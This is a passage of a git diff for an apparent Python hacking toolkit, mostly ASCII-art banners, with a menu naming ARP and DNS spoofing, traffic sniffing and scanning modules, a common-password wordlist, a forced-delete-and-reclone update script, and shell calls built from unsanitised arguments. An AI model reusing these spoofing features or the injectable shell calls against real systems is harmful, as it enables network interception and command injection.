sysinfo() + if x == "netscan": + netscan() + if x == "verscan": + verscan() + if x == "wordlist": + wordlist() + if x == "arpspoof": + arpspoof() + if x == "traff": + traff() + if x == "hashid": + hashid() + if x == "aserver": + aserver() + if x == "terminal": + terminal() + if x == "dnsspoof": + dnsspoof() + if x == "dnsspoof --all": + dnsspoofall() + + except: + print "\nfollow @tuf_unkn0wn on instagram" + print "\nExiting..." + break + os.system("service tor stop") + os.system("service postgresql stop") + found = True +try: + if len(sys.argv) < 2: + starting() + print "{0}Welc{1}ome T{2}o Hacke{3}rs-Too{4}l-Kit{5} Lite\033[0m".format(random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist), random.choice(colorlist)) + time.sleep(1.8) + mainbanner() + main() + if sys.argv[1] == "-h": + print """ +-------------------------------------------------------------- +-h : this menu + +--commandsearch : search for specific commands + +--commandinfo : more info about the commands + +--commandcount : see how many commands are available + +--run : run a command in htk-lite from the terminal + +--proxy : run htkl with proxychains + +--quickrun : run htkl without starting menu +-------------------------------------------------------------- + """ + if sys.argv[1] == "--run": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + os.system("python commandlist/{0}.py".format(sys.argv[2])) + main() + if sys.argv[1] == "--commandcount": + a = os.popen("ls commandlist -1 | wc -l").read() + b = a.replace('\n', '') + if b == "1": + print "(\033[32m{0}\033[0m) Command is available".format(b) + else: + print "(\033[32m{0}\033[0m) Commands are available".format(b) + if sys.argv[1] == "--proxy": + os.system("service tor restart") + os.system("proxychains python htkl.py") + + if sys.argv[1] == "--quickrun": + mainbanner() + main() + + if sys.argv[1] == "--commandinfo": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + try: + command = os.popen('cat commandinfo/{0}.txt'.format(sys.argv[2])).read() + print command + except: + print "No command named {0} available".format(command) + + if sys.argv[1] == "--commandsearch": + if len(sys.argv) < 3: + print "Not Enough Arguments" + sys.exit() + command = os.popen('find commandlist -name "*{0}*"'.format(sys.argv[2])).read() + a = command.replace('commandlist/', '') + b = a.replace('.py', '') + c = b.replace('commandlist', '') + + print "Commands Found Matching '{0}':\n".format(sys.argv[2]) + print c +except: + os.system("") diff --git a/htk-lite/htklupdate.py b/htk-lite/htklupdate.py new file mode 100644 index 0000000..2477b13 --- /dev/null +++ b/htk-lite/htklupdate.py @@ -0,0 +1,4 @@ +import os +print "UPDATING..." +os.system("cd") +os.system('cd /root/ && rm -fr htk-lite && git clone https://github.com/unkn0wnh4ckr/htk-lite && echo "[UPDATED]: Restart Your Terminal"') diff --git a/htk-lite/wordlists/example.txt b/htk-lite/wordlists/example.txt new file mode 100644 index 0000000..3bdd442 --- /dev/null +++ b/htk-lite/wordlists/example.txt @@ -0,0 +1,10 @@ +password +123456 +123 +password123 +admin +root +toor +username +qwerty +PASSWORD diff --git a/htk.py b/htk.py index 894e4f1..70e361b 100644 --- a/htk.py +++ b/htk.py @@ -1,7 +1,28 @@ #!/usr/local/bin/python # coding: latin-1 -#if you use this code give me credit @unkn0wn_bali -#i do not give you permission to edit this script without my credit +#if you use this code give me credit @tuf_unkn0wn +#i do not give you permission to show / edit this script without my credit +#to ask questions or report a problem message me on instagram @tuf_unkn0wn +""" + + + ██░ ██ ▄▄▄ ▄████▄ ██ ▄█▀▓█████ ▓█████▄ +▓██░ ██▒▒████▄ ▒██▀ ▀█ ██▄█▒ ▓█ ▀ ▒██▀ ██▌ +▒██▀▀██░▒██ ▀█▄ ▒▓█ ▄ ▓███▄░ ▒███ ░██ █▌ +░▓█ ░██ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒▓██ █▄ ▒▓█ ▄ ░▓█▄ ▌ +░▓█▒░██▓ ▓█ ▓██▒▒ ▓███▀ ░▒██▒ █▄░▒████▒░▒████▓ + ▒ ░░▒░▒ ▒▒ ▓▒█░░ ░▒ ▒ ░▒ ▒▒ ▓▒░░ ▒░ ░ ▒▒▓ ▒ + ▒ ░▒░ ░ ▒ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░ ░ ░ ░ ▒ ▒ + ░ ░░ ░ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ + ░ ░ + + +""" + + +#this is the loading screen \ the imports START# +#----------------------------------------------# import os print "Starting hackers-tool-kit... [ * ]-[0%]" import platform @@ -71,6 +92,7 @@ os.system("clear") print "Starting hackers-tool-kit... [ * ]-[63%]" import random +import readline os.system("clear") print "Starting hackers-tool-kit... [ *]-[67%]" import string @@ -113,6 +135,8 @@ Gb = random._urandom(20000) bytes = random._urandom(20000) Kb = random._urandom(20000) +#COLOR VARIABLES START# +#---------------------# r = '\033[31m' W = '\033[90m' R = '\033[91m' @@ -125,19 +149,38 @@ Bl = '\033[30m' O = '\033[33m' p = '\033[35m' + +lred = '\033[91m' +lblue = '\033[94m' +lgreen = '\033[92m' +yellow = '\033[93m' +cyan = '\033[1;36m' +purple = '\033[95m' +red = '\033[31m' +green = '\033[32m' +blue = '\033[34m' +orange = '\033[33m' + +colorlist = [red, blue, green, yellow, lblue, purple, cyan, lred, lgreen, orange] +randomcolor = random.choice(colorlist) +#-------------------# +#COLOR VARIABLES END# + os.system("clear") -print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" -os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +print "Starting hackers-tool-kit... [ * ]-[100%] [ \033[1m\033[32mREADY \033[0m]" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @tuf_unkn0wn\a'") os.system("service tor start") os.system("service postgresql start") os.system("clear") -def mainbanner(): - print N+""" _ _ _ _ _ _ _ - _ _ _ _ _ _ _ - | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ - | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| - | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m - |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m +#----------------------------------------------# +#this is the loading screen \ the imports END# + + +#MAIN STARTING BANNER START# +#--------------------------# +def mainbanner1(): + os.system("cat /root/hackers-tool-kit/tools/htkbanner.txt | lolcat") + print N+"""\033[34m .............. \033[0mtype ? for help\033[34m ..,;:ccc,. ......''';lxO. @@ -149,7 +192,7 @@ def mainbanner(): dMc :OO; 0M. .:o. ;Wd - ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ;XO, \033[93mCreated By @tuf_unkn0wn On Instagram\033[34m ,d0Odlc;,.. ..',;:cdOOd::,. .:d;.':;. @@ -171,6 +214,588 @@ def mainbanner(): ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ """.decode('utf-8') +def mainbanner2(): + print """ + type ? for help +\033[92m + ▄█ ▄█ ▄█ + ███ ███ ███ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███▌ ███▌ ███▌ + ███ ███ ███ + ███ ███ ███ + █▀ █▀ █▀ + + ┬ ┬┌─┐┌─┐┬┌─┌─┐┬─┐┌─┐ + ├─┤├─┤│ ├┴┐├┤ ├┬┘└─┐\033[90m + ┴ ┴┴ ┴└─┘┴ ┴└─┘┴└─└─┘ + ┌┬┐┌─┐┌─┐┬ ┬┌─┬┌┬┐\033[92m + │ │ ││ ││───├┴┐│ │ + ┴ └─┘└─┘┴─┘ ┴ ┴┴ ┴ \033[0m +Created By @tuf_unkn0wn + """.decode('utf-8') +def mainbanner3(): + print """\033[91m + ▒\033[90m██ ██\033[91m▒ ▒\033[90m██ ██\033[91m▒ + ▒▒ \033[90m█ █ \033[91m▒░ ▒▒ \033[90m█ █ \033[91m▒░ + ░░ \033[90m█ \033[91m░ ░░ \033[90m█ \033[91m░ + ░ \033[90m█ █ \033[91m▒ ░ \033[90m█ █ \033[91m▒ + ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ ▒\033[90m██\033[91m▒ + ▒▒ ░ ░▓ ░ ▒▒ ░ ░▓ ░ + ░░ ░▒ ░ ░░ ░▒ ░ + ░ ░ ░ ░ + ░ ░ ░ ░ + \033[90m + + ████████████████████ + ██ ██\033[91m + ▒▒ ▒▒ + ░░ ░░ + ░ ░ + ░ ░\033[0m + +888 888 88888888888 888 d8P +888 888 888 888 d8P +888 888 888 888 d8P \033[1;36m +8888888888 888 888d88K +888 888 888 8888888b\033[0m +888 888 888888 888 888888 888 Y88b +888 888 888 888 Y88b +888 888 888 888 Y88b + Created By @tuf_unkn0wn On Instagram + type ? for help + """.decode('utf-8') +def mainbanner4(): + print P+""" + .S S. sdSS_SSSSSSbs .S S. + .SS SS. YSSS~S%SSSSSP .SS SS. + S%S S%S S%S S%S S&S + S%S S%S S%S S%S d*S + S%S SSSS%S S&S S&S .S*S + S&S SSS&S S&S S&S_sdSSS + S&S S&S S&S S&S~YSSY%b + S&S S&S S&S S&S `S% + S*S S*S S*S S*S S% + S*S S*S S*S S*S n& + S*S S*S S*S S*S wS& + SSS S*S S*S S*S 0 SS + h SP SP SP n + a Y Y Y k + c n + k e r s - t o o l - k i t by @tuf_u\033[0m + + type ? for help + """.decode('utf-8') +def mainbanner5(): + print R+""" + ██▀███ ▄▄▄ ▒███████▒ ▒█████ ██▀███ + ▓██ ▒ ██▒▒████▄ ▒ ▒ ▒ ▄▀░▒██▒ ██▒▓██ ▒ ██▒ + ▓██ ░▄█ ▒▒██ ▀█▄ ░ ▒ ▄▀▒░ ▒██░ ██▒▓██ ░▄█ ▒ + ▒██▀▀█▄ ░██▄▄▄▄██ ▄▀▒ ░▒██ ██░▒██▀▀█▄ + ░██▓ ▒██▒ ▓█ ▓██▒▒███████▒░ ████▓▒░░██▓ ▒██▒ + ░ ▒▓ ░▒▓░ ▒▒ ▓▒█░░▒▒ ▓░▒░▒░ ▒░▒░▒░ ░ ▒▓ ░▒▓░ + ░▒ ░ ▒░ ▒ ▒▒ ░░░▒ ▒ ░ ▒ ░ ▒ ▒░ ░▒ ░ ▒░ + ░░ ░ ░ ▒ ░ ░ ░ ░ ░░ ░ ░ ▒ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ + ░\033[0m + .,,,,,,,,,,.,,,.....,........................... + ...,...,....,.,..,......,,,,.......,.,,,,,,,.,,, + ..,......,.....,,.,........,,...........,,.,.... + ...,.,,.,....,,,,..,..,,,,,,......,,.,...,..../ + ***********************//***/***//**/********** + ****************** ****************** @tuf_unkn0wn + *,*****,*,******** ***,************** + **,,,,,,,,,,,,,,*,,,,, *,,,,,,,,,*,,,,,,,,,** type ? for help + ,,,,,,,,,,,,,,,,,,,,,,,*,,,,,,,,,,,,,,,,,,,,,,, + ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,, + ***********************************************\033[91m + + ▄████▄ █ ██ ▄▄▄█████▓ ██████ + ▒██▀ ▀█ ██ ▓██▒▓ ██▒ ▓▒▒██ ▒ + ▒▓█ ▄ ▓██ ▒██░▒ ▓██░ ▒░░ ▓██▄ + ▒▓▓▄ ▄██▒▓▓█ ░██░░ ▓██▓ ░ ▒ ██▒ + ▒ ▓███▀ ░▒▒█████▓ ▒██▒ ░ ▒██████▒▒ + ░ ░▒ ▒ ░░▒▓▒ ▒ ▒ ▒ ░░ ▒ ▒▓▒ ▒ ░ + ░ ▒ ░░▒░ ░ ░ ░ ░ ░▒ ░ ░ + ░ ░░░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ + ░ \033[0m + """.decode('utf-8') +def mainbanner6(): + print """ + |-|____________________ + /|_|_\ /__,''___ /____ /| + |\033[90mHHHHHH\033[0m| \_/ |\033[90mHHHHH\033[0m|/| + |``````|_________|`````| | + | \033[93m~~~~~~~~~~~~~~\033[0m | | + | .-/\-, | | + | _\\//_ | | + | \033[92m| /(_)|\033[0m | | + |\033[92m_______|_||.-.|_______\033[0m|/| + |\033[90mHHHHHHH\033[0m| ||:_ |\033[90mHHHHHHH\033[0m|/| + |\033[92m```````|_||:_)|```````\033[0m| | + | \033[92m|______| \033[0m| | + | ______ | | + | (__\033[90m24\033[0m__) | | + | ~~~~~~~~ | | + | By @tuf_unkn0wn | | + |______________________|/ + \033[91m + ) ( ) ( + ( /( )\ ) ( /( )\ ( ( ( + )\()|(_| /( ( )\()) ((_)))\ ( )\))( ( + ((_)\ _ )(_)) )\((_)\ _ /((_) )\ )((_))\ )\ + | |(_) ((_)_ ((_) |(_) | (_))( _(_/( (()(_|(_) + | '_ \ / _` / _|| / / | | || | ' \)) _` |(_-< + |_.__/_\__,_\__||_\_\ |_|\_,_|_||_|\__, |/__/ + |___/ + \033[90m + ) + (\033[33m + _ \033[0m___________ \033[90m)\033[33m + [_[\033[0m___________\033[91m#\033[0m + type ? for help + """.decode('utf-8') +def mainbanner7(): + os.system("cat /root/hackers-tool-kit/tools/skull.txt") +def mainbanner8(): + print """ + type ? for help\033[91m + +@@@ /$$ /$$ @@@ +@@@ | $$ | $$ @@@ +@@! | $$ | $$ @@! +!@! | $$$$$$$$ !@! +!!@ | $$__ $$ !!@ +!!! | $$ | $$ !!! +!!: | $$ | $$ !!: +:!: |__/ |__/ :!: +@@@ @@@\033[94m +@@@ @@@ +@@! @@! +!@! /$$$$$$$$ !@! +!!@ |__ $$__/ !!@ +!!! | $$ !!! +!!: | $$ !!: +:!:---------------| $$---------------:!: +@@@ | $$ @@@ +@@@ | $$ @@@ +@@! |__/ @@! +!@! !@!\033[91m +!!@ !!@ +!!! /$$ /$$ !!! +!!: | $$ /$$/ !!: +:!: | $$ /$$/ :!: +@@@ | $$$$$/ @@@ +@@@ | $$ $$ @@@ +@@! | $$\ $$ @@! +!@! | $$ \ $$ !@! +!!@ |__/ \__/ !!@ +!!! !!! +!!: !!: +:!: :!:\033[92m + :: :: +: @tuf_unkn0wn :\033[0m +""" +def mainbanner9(): + print """ +\033[91m╔\033[0m██████████████████████████████████████████████████████████████████\033[91m═╗ +║ ║ +\033[33m║ ║ +║\033[0m ▄▀▀▀▀▄ ▄▀▀▄ ▀▀▄ ▄▀▀▀▀▄ ▄▀▀▀█▀▀▄ ▄▀▀█▄▄▄▄ ▄▀▀▄ ▄▀▄ \033[33m║ +\033[93m║\033[0m █ █ ▐ █ ▀▄ ▄▀ █ █ ▐ █ █ ▐ ▐ ▄▀ ▐ █ █ ▀ █ \033[93m║ +║\033[0m ▀▄ ▐ █ ▀▄ ▐ █ █▄▄▄▄▄ ▐ █ █ \033[93m║ +\033[92m║\033[0m ▀▄ █ █ ▀▄ █ █ █ ▌ █ █ \033[92m║ +║\033[0m █▀▀▀ ▄▀ █▀▀▀ ▄▀ ▄▀▄▄▄▄ ▄▀ ▄▀ \033[92m║ +\033[1;36m║\033[0m ▐ █ ▐ █ █ ▐ █ █ \033[1;36m║ +║\033[0m ▐ ▐ ▐ ▐ ▐ \033[1;36m║ +\033[94m║\033[0m ▄▀▀█▄▄ ▄▀▀▀▀▄ ▄▀▀▄ ▄▀▀▄ ▄▀▀▄ ▀▄ \033[94m║ +║\033[0m █ ▄▀ █ █ █ █ █ ▐ █ █ █ █ █ \033[94m ║ +\033[34m║\033[0m ▐ █ █ █ █ ▐ █ █ ▐ █ ▀█ \033[34m║ +║\033[0m █ █ ▀▄ ▄▀ █ ▄ █ █ █ \033[34m║ +\033[95m║\033[0m ▄▀▄▄▄▄▀ ▀▀▀▀ ▀▄▀ ▀▄ ▄▀ ▄▀ █ \033[95m║ +║\033[0m █ ▐ ▀ █ ▐ \033[95m║ +\033[35m║\033[0m ▐ ▐ \033[35m║ +║ ║\033[1;31m +╚═\033[0m█████████████████████████████████████████████████████████████████\033[1;31m═╝\033[0m + type ? for help + """.decode('utf-8') + +def mainbanner10(): + print """\033[0m + ░░░▓█▒░▒▒▒▓▓░ + ░░░░░▓▓░▒▓▓▓▓▓▓▓▓▓▓▓█░░░░ + ░░█▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░ + ░░█▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓░░░ + ░░░░ ░░▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██░░ ░░░░ + ░░░░░░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓████████▒░░ ░░▓▒▒▒▒▓░░ + ░▓░▒▒▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████▓░░░░░▒▓▓▓▓▓▓███████ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█████████████████████████████████░░░░░░░ + ░░▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓█▓▓▓▓██████████████████████████████████░ + ░█▓▓▓██████████▓▓▓▓▓▓▓▓▓▓▓▓▓██████████████████████████████████▒░ + ░▒▓▓▓████░░░░░░░░░░░░░▒▓███████████████████████████████████████░░ + ░▓▓▓███▒▒░░░░░░░░░░░░░░░░░░░░▒██▓██████████████████████████████░░ + ░█▓▓███░░░░░░░░░░░░░░░░░░░░░░░░░░░▒███████████████████████████▓░ + ░█▓▓███▒░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░█████████████████░░░░░░░░░ + ░░▓▓████░░░░░░░░░░░░░░░░░░░░████▓░░░░░░░░█████████████▓░ + ░█▓█████░░░░░░░░░░░░░░░░░▒░████████░░░░░░░████████████░░ + ░░▒▓█████░░░░▒░▓████░░░░░░▒░█████████▓░░░░░███████████▓░░░░░ + ░░▓▒▓█████░░░▒░▓██████░░░░░▒░▓█████████░░░░░▒██████████░░▒▒▓░ + ░░█▒▓▓████▒░░░░███████▓░░░░░▒░░████████▓░░░░▒████████░▓░▓▓░▓▓░░░ + ░░░▒▓▓▓████░░░░▓██████▓░░░░░░▒░░░▓█████░░░░░███████▓░▓▓▓▓▓▓▒▒░░░ + ░▒▒▓▓████░░▒░░██████░░░░░░░░░▒░░░░░░▒░░░░░████▓░▒▓▓▓▓▓░░░▒▒▒░▒░ + ░░▓▓████░░░▒░░▒███░░▒▓▒▒█▓░░░░░░░░░░░░░▒██▓▒▓▓▓▓▓▓▒░░░░░░▒▒▒▒▒░░ + ░░░░████░░░░░░░░░░░░░█░░▓█▓░░░░██████████▒▒▓▓▓▓░░░░░▒░░░░░▒▒▒▒▒░ + ░░░░░░ ░░████░░░░░░░░░░░░░░░░░░░░░░███████▓▒▓▓░░░░░░░ ░░░░░░░▒▒▒░▒░ + ░▒░░▒░░░▒░▒█████▓▒░▒█░░░░░░░░░░░░░░░░███▓▒▓▒░░ ░▒░░░░▒▒▒░░░░ + ░░▒░▒░░░░░░░██████████░░░░░░▒░░░▒░░▒▒▒▒▒▒▒░░░ ░▒░░░░▒▒░▒░░ + ▒░░░░░▒▒▒░░░░░░██████░░▒▒▒▒▒▒▒▒▒▓█▓▓▒▒▓▓▓█░ ░░▒░░░░▒▒▒░░ + ░░░░░░▒▒░░░░ ░░▓▓▓▓▓▓▓█▓▓▒▒▓▓█▓▓▓▓▓█ \033[92m@tuf_unkn0wn\033[0m ░░░░░░░▒░░░ + ░░▒░░░░░▒▓█ ░▒▒▓▓▓▓█▓█▓▓▒▒▓▓██▓▓▓▓▓▓█ \033[94mtype ? for help\033[0m ░░░░░▒▒░░ + ░▒░░░░█▓██▒░▒▓▓██▓▒▒▒▒▓▒▓▓████▓▓▓▓▓██▒ ▒░░░░░▒░░ + ░░▓▒█▓▓▓▓▓▓▓██▓▒▒░▒▒▒▒█▓▓███▓▓▓▓▓▓█░ ▒░░░░▒░ + ░▒███▓▓▓▓▓▓▓▓▓▓▒▒▒▒▒▒▒░▒████▓▓▓▓▓▓▒░ ▒░░░░░ + ░████▓▓▓▓▓▓▓▒▓▓▓▓█▒▒░░▒░█▓█▓█▓████░ ▒░░▒░░ + ░▓██▓▓▓▓▓▒▓▓▓▓▓▓▓▓▓▓▓▓▒▒▓▓█▓▓▓▓██▒░ ░░▒░ + ░░██▓▓▒▓▓██▓▓▓▓▓▓▓▓▓████▓▓▓▓█▓▓█░░░ + ░██▓▓███▒▓▓▓▓▓▓▓▓▓█████▓██▓██░░ + ░░█▓█░░ ░▒▒▓▓▓▓▓▓▓▓▓███▓██▓█░ + ▓█░ ░█▓▓▓▓▓▓▓▓▓████▓███░ ░ + ░█▓▓▓▓▓▓███████▓██▓██░ + ░██▓▓▓████████████████░░░ + ░▓▓▓▓▓███████▓█▓████████░ ░░░ + ░░░█▓█████████████████████████▓▓▓▒░░░░░░ + ░░░▒█▓█▓██████████████████████▓███████████████░░░░░░░░░ + ▓█▒▓▓▓▓▓▓█████████████████████████████████████████████████░ + ░█▓▓▓▓▓▓▓▓▓█████████████████████████████████████▒░░░ ░ ░░░░ + ░░▓█▓█▓█████████████████████████████░░ + \033[0m""".decode('utf-8') +def mainbanner11(): + print """\033[91m + ██████╗ ██████╗ ██████╗ + ██╔════╝ ██╔════╝ ██╔════╝ + ███████╗ ███████╗ ███████╗ + ██╔═══██╗██╔═══██╗██╔═══██╗ + ╚██████╔╝╚██████╔╝╚██████╔╝ + ╚═════╝ ╚═════╝ ╚═════╝ + ░░░░ ░░░░░ + ░▒███████▓▒░░ ░░░████████▓░░░ + ░▓████████████▒░░ ░░█████████████░░ + ▒▓░ ░░████████░░ ░░████████░░░ ░░▒█░ + ░ ░██████▒░ ░░░░███████ ░░ + ░░███████░░ ░░██████▓░ + ░███████░░ ░▒██████▒ + ░░░░ ░░███████░░░███████▒░ ░░░ + ░░░░░ ░░░███████░████████░░░ ░░░ ░░░░ + ░░▓████▓▒░░░░▒▒███████████████░░░░░░░▒▓████░ ░ + ░▒██████████████▒████████▒██████████████░░ + ░░██████████████▒░███▒▒▒█████████████░░ + ░░░░▓████████░█░▓▓▒████████▒░░░░░ + ░░████████▓░██░████████▒░░░ + ░░▒██████░▒▒░░▒░░██████░ + ░░█████████▓░█░████▓███▓░ + ░▒█▓░▒██████▒███████░░█▓░ + ░░░███████████████████▓░░ + ░▒▓████████████████▒░ + ░░▒███████████████▓▒░ + ░▒█████▓██████░░ + ░██████████░ + @tuf_unkn0wn ░█████████▒ type ? for help + █████████░░ + ░░████████░░ + ░▓█████▓░ + ░▓████▒░ + ░░████░ + ░░░▒██░░ + ░█▓░ + ░░▓░░ + ░░░░░ + ░░ + \033[0m""".decode('utf-8') +def mainbanner12(): + print """\033[91m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner13(): + print """\033[92m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner14(): + print """\033[34m + + +██╗ ██╗ █████╗ ██████╗██╗ ██╗███████╗██████╗ ███████╗ ████████╗ ██████╗ ██████╗ ██╗ ██╗ ██╗██╗████████╗ +██║ ██║██╔══██╗██╔════╝██║ ██╔╝██╔════╝██╔══██╗██╔════╝ ╚══██╔══╝██╔═══██╗██╔═══██╗██║ ██║ ██╔╝██║╚══██╔══╝ +███████║███████║██║ █████╔╝ █████╗ ██████╔╝███████╗█████╗██║ ██║ ██║██║ ██║██║█████╗█████╔╝ ██║ ██║ +██╔══██║██╔══██║██║ ██╔═██╗ ██╔══╝ ██╔══██╗╚════██║╚════╝██║ ██║ ██║██║ ██║██║╚════╝██╔═██╗ ██║ ██║ +██║ ██║██║ ██║╚██████╗██║ ██╗███████╗██║ ██║███████║ ██║ ╚██████╔╝╚██████╔╝███████╗ ██║ ██╗██║ ██║ +╚═╝ ╚═╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝╚══════╝ ╚═╝ ╚═════╝ ╚═════╝ ╚══════╝ ╚═╝ ╚═╝╚═╝ ╚═╝ + + + """.decode('utf-8') +def mainbanner15(): + print """\033[93m + __ _ + _wr"" "-q__ + _dP 9m_ + _#P 9#_ + d#@ \033[92mtype ? for help\033[93m 9#m + d## ### + J### ###L + {###K J###K + ]####K ___aaa___ J####F + __gmM######_ w#P"" ""9#m _d#####Mmw__ + _g##############mZ_ __g##############m_ + _d####M@PPPP@@M#######Mmp gm#########@@PPP9@M####m_ + a###"" ,Z"#####@" '######"\g ""M##m + J#@" 0L "*## ##@" J# *#K + #" `# "_gmwgm_~ dF `#_ +7F "#_ ]#####F _dK JE +] *m__ ##### __g@" F + \033[92m@tuf_unkn0wn\033[93m "PJ#####LP" \033[92mhackers-tool-kit\033[93m + ` 0######_ ' + _0########_ + . _d#####^#####m__ , + "*w_________am#####P" ~9#####mw_________w*" + ""9@#####@M"" ""P@#####@M"" +\033[92m + ██░ ██ ▄▄▄█████▓ ██ ▄█▀ + ▓██░ ██▒▓ ██▒ ▓▒ ██▄█▒ + ▒██▀▀██░▒ ▓██░ ▒░▓███▄░ + ░▓█ ░██ ░ ▓██▓ ░ ▓██ █▄ + ░▓█▒░██▓ ▒██▒ ░ ▒██▒ █▄ + ▒ ░░▒░▒ ▒ ░░ ▒ ▒▒ ▓▒ + ▒ ░▒░ ░ ░ ░ ░▒ ▒░ + ░ ░░ ░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░\033[0m + """.decode('utf-8') +def mainbanner16(): + print """\033[91m + :PB@Bk: + ,jB@@B@B@B@BBL. + 7G@B@B@BMMMMMB@B@B@Nr + :kB@B@@@MMOMOMOMOMMMM@B@B@B1, + :5@B@B@B@BBMMOMOMOMOMOMOMM@@@B@B@BBu. + 70@@@B@B@B@BXBBOMOMOMOMOMOMMBMPB@B@B@B@B@Nr + G@@@BJ iB@B@@ OBMOMOMOMOMOMOM@2 B@B@B. EB@B@S + @@BM@GJBU. iSuB@OMOMOMOMOMOMM@OU1: .kBLM@M@B@ + B@MMB@B 7@BBMMOMOMOMOMOBB@: B@BMM@B + @@@B@B 7@@@MMOMOMOMM@B@: @@B@B@ + @@OLB. BNB@MMOMOMM@BEB rBjM@B + @@ @ M OBOMOMM@q M .@ @@ + @@OvB B:u@MMO\033[31mMOMMBJiB .BvM@B + @B@B@J 0@B@MMOMOMOMB@B@u q@@@B@ + B@MBB@v G@@BMMMMMMMMMMMBB@5 F@BMM@B + @BBM@BPNi LMEB@OMMMM@B@MMOMM@BZM7 rEqB@MBB@ + B@@@BM B@B@B qBMOMB@B@B@BMOMBL B@B@B @B@B@M + J@@@@PB@B@B@B7G@OMBB. ,@MMM@qLB@B@@@BqB@BBv + iGB@,i0@M@B@MMO@E : M@OMM@@@B@Pii@@N: + . B@M@B@MMM@B@B@B@MMM@@@M@B + @B@B.i@MBB@B@B@@BM@::B@B@ + B@@@ .B@B.:@B@ :B@B @B@O + :0 r@B@ B@@ .@B@: P: + vMB :@B@ :BO7 + ,B@B\033[0m + + \033[32m╔═══\033[93m+\033[0mHackers-Tool-Kit\033[93m+\033[32m════╗\033[0m + ███████████████████████████ + type █?█ for help + ███ + \033[31m▄▄ ▄▄ \033[0m███\033[31m ▄▄ ▄▄▄ + ██ ██ \033[0m███\033[31m ██ ██▀ + ██ ██ \033[0m███\033[31m ██▄██ + ████████ \033[0m███\033[31m █████ + ██ ██ \033[0m███\033[31m ██ ██▄ + ██ ██ \033[0m███\033[31m ██ ██▄ + ▀▀ ▀▀ \033[0m▀▀▀\033[31m ▀▀ ▀▀\033[0m + """.decode('utf-8') +def mainbanner17(): + print """ + + 